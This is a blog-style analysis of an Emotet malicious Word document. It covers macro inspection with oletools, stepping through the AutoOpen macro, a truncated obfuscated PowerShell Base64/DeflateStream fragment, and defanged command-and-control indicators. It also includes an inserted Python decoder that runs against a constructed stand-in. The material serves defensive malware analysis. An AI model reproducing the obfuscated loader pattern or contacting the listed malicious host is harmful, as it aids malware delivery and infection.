Emotet malware analysis


VirusTotal sample – c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c

File Type: Microsoft Word Document

Document Property:

I used oletools to analyse the Word document's properties and content.

[Screenshots: wm2.PNG, wm3.PNG]

This word document has VBA macros.

Parsing the document with olevba reports that the file contains suspicious hex strings and Base64 strings.

The file contains the following macro modules:

  • LUDoB_BX.cls
  • fkkkCAk.bas
  • ZAAcAA.bas

The macros auto-execute when the document is opened (AutoOpen).

[Screenshot: wm4.PNG]

I started debugging the macros inside Word.

[Screenshot: wm5.PNG]

After clicking Enable Editing, open View Macros under the View tab.

[Screenshots: wm6, wm7]

Click Edit and rename the autoopen() function to autoopen2(), so that Word no longer runs it automatically on open and it can be stepped through in the debugger instead.

[Screenshot: wm8]

There are many small chunks of Base64 strings which are concatenated at run time to build a PowerShell script. I captured the Base64 string in a text file and tried to decode it. I did not get the complete Base64, only part of it, but it can be recognised as a PowerShell script.

[Screenshot: wm14.PNG]

(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] [coNverT]::FrOMbase64stRING(('ZZJh'+'i'+'5'+'tAEIb/y'+'n'+'4'+'QNiFVz9YP5US4MbYSS'+'gOmhLN'+'H'+'QXQz'+'6kbd9XSjOUL'+'+e'+'zdtJbSdb7s87z'+'vDO2'+'O8g'+'q5'+'z4P'+'r0E'+'EA'+'an8'+'OI'+'esbXKA5TGfoCJ1PmR2SK'+'bFFZz5ivG45'+'CecZrKJMA'+'wKeV'+'Ut2jbW'+'M'+'7
IArsj9xisrWnzmRSKI3'+'a'+'u'+'9'+'2Xk/10wwbNVRmTQ6npG'+'csO'+'LRe24'+'zjuHZq'+'m'+'yaoy'+'c'+'chPvF'+'F'+'Z1w3/e'+'k4'+'f'+'FLs9Cl'+'7aT'+'v5'+'b+EfXv2Wi63FQv'+'zSs5Gau/Y/'+'tJ'+'7m9N'+'xiwH3nBR/'+'zPeDdubW'+'p96xquFvSJLj1j1Pk44'+'L74N'+'N'+'iDT
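The fragment above has the classic shape: '+'-joined string literals, Base64-decoded, then inflated through a raw DeflateStream. To recover such a script statically instead of letting the macro run it, here is an added Python example (mine, not the post's or the sample's code): it builds a constructed stand-in blob in the same layout, rebuilds the Base64 from the quoted pieces, and inflates it. The wrapper text and SAMPLE_SCRIPT are constructed for the demo.

```python
import base64
import re
import zlib

# Constructed stand-in for the script hidden in the macro; the real sample's
# payload is truncated on the page, so nothing here is taken from it.
SAMPLE_SCRIPT = "$u='hxxp://example.invalid/wp-content/x/';Invoke-WebRequest $u"

def make_obfuscated_sample(script: str, chunk: int = 4) -> str:
    """Mimic the macro's layout: raw-DEFLATE compress, Base64 encode, split into
    small '+'-joined literals and wrap in the case-scrambled DeflateStream call."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15 = raw DEFLATE, no zlib header
    data = comp.compress(script.encode("utf-8")) + comp.flush()
    b64 = base64.b64encode(data).decode("ascii")
    joined = "+".join(f"'{b64[i:i + chunk]}'" for i in range(0, len(b64), chunk))
    return ("(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] "
            f"[coNverT]::FrOMbase64stRING(({joined}) ), "
            "[IO.cOMPrESSiON.CoMPressIonmoDe]::dECOmpReSs))")

def extract_b64_argument(text: str) -> str:
    """Return the text inside FromBase64String( ... ), honouring nested parentheses
    and ignoring the scrambled letter case that PowerShell tolerates."""
    m = re.search(r"FromBase64String\s*\(", text, re.I)
    if not m:
        raise ValueError("no FromBase64String( call found")
    depth, i = 1, m.end()
    while i < len(text) and depth:
        depth += {"(": 1, ")": -1}.get(text[i], 0)
        i += 1
    # A truncated capture never closes the paren; keep whatever is there.
    return text[m.end():i - 1] if depth == 0 else text[m.end():]

def rebuild_base64(text: str) -> str:
    """Join every single-quoted literal in the argument, which is exactly what
    PowerShell's '+' operator does at run time. Curly quotes (as pasted into a
    blog post) are normalised to straight ones first."""
    arg = extract_b64_argument(text.replace("\u2018", "'").replace("\u2019", "'"))
    return "".join(re.findall(r"'([^']*)'", arg))

def decode_deflate_payload(text: str) -> str:
    """Base64-decode the rebuilt string and inflate it as raw DEFLATE, matching
    System.IO.Compression.DeflateStream in Decompress mode."""
    raw = base64.b64decode(rebuild_base64(text))
    return zlib.decompress(raw, -15).decode("utf-8", errors="replace")

if __name__ == "__main__":
    blob = make_obfuscated_sample(SAMPLE_SCRIPT)
    print(blob[:120] + "...")
    print(decode_deflate_payload(blob))
```

On a real capture, paste the full `FrOMbase64stRING((...))` expression into `decode_deflate_payload`; an incomplete copy like the one above will fail at the Base64 step, which is the first sign that the chunk list was not captured whole.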

While debugging, I found the values shown below stored in the variable YAAAAAA; the macro is reading registry key values.

[Screenshots: wm9, wm10, wm13.PNG]

While debugging, I captured traffic with Wireshark and found that a connection was made to the website emseenerji[.]com at IP 94[.]73[.]147[.]237. The URL is still alive and can be accessed.

[Screenshots: wm11.PNG, wm12.PNG]

The complete URL accessed by this program is http:// emseenerji[.]com/wp-content/RRKu/

My host machine's AV blocked this URL, so I could not analyse the traffic from it to my VM any further.

Thank you.
